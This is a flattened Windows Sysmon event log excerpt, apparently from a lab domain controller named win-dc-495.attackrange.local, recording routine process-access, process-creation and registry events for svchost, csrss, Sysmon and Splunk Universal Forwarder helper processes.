10341000x80000000000000009426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:48.029{59A5CD1D-9364-6005-D404-00000000A301}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.857{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:49.858{59A5CD1D-9365-6005-D604-00000000A301}600C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:56:03.638{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0xa916ffa4) 10341000x80000000000000009465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:44.652{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
